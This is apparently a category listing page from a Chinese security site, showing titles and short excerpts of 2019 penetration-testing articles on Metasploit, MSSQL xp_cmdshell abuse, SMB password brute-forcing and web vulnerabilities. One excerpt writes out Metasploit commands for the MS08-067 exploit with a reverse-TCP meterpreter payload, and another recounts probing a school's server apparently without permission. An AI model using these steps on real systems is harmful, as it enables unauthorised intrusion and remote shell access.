安基網 首頁 安全滲透測試
訂閱

滲透測試

  • Kali Linux滲透測試篇:Metasploit不同應用場景使用教程

    Kali Linux滲透測試篇:Metasploit不同應用場景使用教程
    1.遠程代碼執行 msfconsole search 08-067 use exploit/windows/smb/ms08_067_netapi show options set RHOST IP show payloads set payload windows/meterpreter/reverse_tcp show options set LHOST ip info(查看影響版本) 用nmap查看目標服務器版本 set target 編號 show options(檢查是否已經設置 ...
    2019-6-25 12:16
  • 淺談滲透測試實戰

    淺談滲透測試實戰
    0x00 前言很多時候,在看白帽子們的漏洞的時候總有一種感覺就是把web滲透簡單地理解成了發現web系統漏洞進而獲取webshell。其實,個人感覺一個完整的滲透(從黑客的角度去思考問題)應該是以盡一切可能獲取目標的系統或者服務器的最高權限,盡可能的發現足夠多的敏感信息。這個過程應該包括但不限于以 ...
    2019-6-12 10:58
  • 滲透測試心得

    滲透測試心得
    子域名收集子域名收集是最簡單的收集手法之一,有很多在線的工具可以直接套用,這里分享幾個我經常用的。開心的時候用用這個掃描器為什么這么說,因為這是我寫的(你生氣用的話我怕我屏幕里突然冒出一個拖孩):impo ...
    2019-6-11 09:05
  • 詳述MSSQL服務在滲透測試中的利用

    詳述MSSQL服務在滲透測試中的利用
    前言:致力于復現最實用的漏洞利用過程。本文將帶領大家學習以下內容:學習使用`xp_cmdshell`擴展存儲過程學習調用`wscript.shell`學習MSSQL寫文件學習沙盤模式提權學習注冊表映像劫持提權part1 使用`xp_cmdshell`擴展存儲過程步驟1 連接MSSQL服務首先打開S ...
    2019-6-7 09:34
  • Kali Linux學習篇:如何使用Kali Linux獲取http協議賬戶密碼?

    Kali Linux學習篇:如何使用Kali Linux獲取http協議賬戶密碼?
    HTTP介紹HTTP協議是Hyper Text Transfer Protocol(超文本傳輸協議)的縮寫,是用于從萬維網(WWW:World Wide Web )服務器傳輸超文本到本地瀏覽器的傳送協議。HTTP是一個基于TCP/IP通信協議來傳遞數據(HTML 文件, 圖片文件, 查詢結果等)。HTTP是一個屬于應用層的面向對象的協議,由于其簡捷、快速的 ...
    2019-6-2 11:24
  • 作為內網殺手的metsploit如何在外網使用呢?

    作為內網殺手的metsploit如何在外網使用呢?
    經常使用metsploit的同學可能會有疑問,為啥我只能在同一局域網里面進行滲透主機呢? 這主要是因為你的身處于內網之中。不知道大家對內網和外網的理解是什么?這里我給大家普及一下吧!經常使用metsploit的同學可能會有疑問,為啥我只能在同一局域網里面進行滲透主機呢?……這主要是因為你的身處于內 ...
    2019-6-1 09:15
  • Kali Linux 滲透測試手冊(第2版)

    Kali Linux 滲透測試手冊(第2版)
    1.1 http method1.1 wp1.2 前端基礎1.2 wp1.3 數據庫基礎2.1 sql注入基礎2.2 sql注入實戰2.2 補充 sql注入原理篇2.3 字符型注入2.4 sql注入之雙查詢注入2.6 sql注入之讀取文件2.7 sql注入之bool 注入2.8 sleep注入2. ...
    2019-5-30 01:39
  • 史上最強滲透測試思維導圖

    史上最強滲透測試思維導圖
    這是我從一個攻擊者角度出發制作的一張思維導圖包括了滲透測試從前期的信息收集、弱點分析到代碼審計、bypass繞過、后滲透攻擊等部分。非常詳細的縱向總結了各種攻擊手法與種類,旨在讓企業和個人更全面的了解網絡攻 ...
    2019-5-30 01:37
  • Kali Linux Web 滲透測試秘籍 中文版

    Kali Linux Web 滲透測試秘籍 中文版
    在我們開始 Web 應用安全測試之前,我們需要確保我們擁有所有必要的最新工具。這個秘籍涉及到使 Kali 和它的工具保持最新版本的基本步驟。我們從 Kali 已經作為主操作系統安裝到計算機上,并帶有網絡連接來開始。這 ...
    2019-5-30 01:31
  • 常見web漏洞(Sql注入、XSS、CSRF)原理以及攻防總結

    常見web漏洞(Sql注入、XSS、CSRF)原理以及攻防總結
    Sql注入所謂SQL注入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。 攻擊者通過在應用程序預先定義好的SQL語句結尾加上額外的SQL語句元素,欺騙數據庫服務 ...
    2019-5-30 00:08
  • 黑客之實踐一次《網絡域名劫持》

    黑客之實踐一次《網絡域名劫持》
    在挖某廠商的SRC時,我用了農夫安全的farmscan_domain對他進行了子域名挖掘,發現了一個子域名為xxxxxx.x.com訪問他發現了然后我意識到了這里有搞頭信息收集反解析ip 發現他是騰訊云下的服務器用nmap掃描端口 發現他開放了22 80 888 8888端口然后直接訪問ip時 返回了一個json數據{"code":0,"msg ...
    2019-5-27 00:44
  • 一波三折,測試迷妹學校的服務器。

    一波三折,測試迷妹學校的服務器。
    起因:沒事閑的一直跟這個迷妹聊天,聊著聊著就提到她的學校了。于是百度看了看他的學校。第一個就是他們的官網。沒什么可說的。那打開看看吧。 這個都可以放出來?還有這種操作? 目測這個監控平臺是海康威視的。但是仔細看看url發現。是域名上面的一個端口。這就說明。這個網站的IP地址,是這所學校 ...
    2019-5-26 16:59
  • 分享10大白帽黑客專用的 Linux 操作系統

    分享10大白帽黑客專用的 Linux 操作系統
    概述今天分享十個黑客專用的操作系統,它們被白帽黑客用作滲透測試的工具。這里我把 Kali Linux 列為首位,是因為它在滲透測試中非常流行,它的開發團隊 Offensive security 同時也是開發 BackTrack 的團隊。下面一起來看下吧~1. Kali LinuxKali Linux 是一個 Debian 衍生發行版,設計用于數字取證和滲 ...
    2019-5-26 01:50
  • 遠程漏洞攻擊:遠程提權任意思科1001-X路由器

    遠程漏洞攻擊:遠程提權任意思科1001-X路由器
    思科1001-X路由器不是家里常見的那種,它更大更貴,負責股票交易所、企業辦公樓和大型購物中心等設施的可靠連接。換句話說,這些設備在組織機構中起著重要作用,包括那些需要處理高度敏感性信息的機構。最近,研究人員披露了一種遠程攻擊方法,可使黑客接管任意1001-X路由器,獲取其上流經的所有數據和 ...
    2019-5-21 04:01
  • Kali Linux滲透測試篇:使用acccheck檢測Windows用戶密碼安全

    Kali Linux滲透測試篇:使用acccheck檢測Windows用戶密碼安全
    acccheck是設計用來po解使用SMB協議的Windows用戶密碼的。SMB是一種網絡通信協議,使用SMB協議可以實現不同類型設備之間數據傳遞。例如,文件、打印機共享也是基于這個協議。acccheck就是使用perl封裝了smbclient命令;它使用暴力破解的方式試出Windows用戶密碼。一個簡單的例子:打開共享的Windows一臺 ...
    2019-5-21 04:00
  • 12345下一頁
    最新
    熱門
    返回頂部
    云南快乐十分开奖结果前三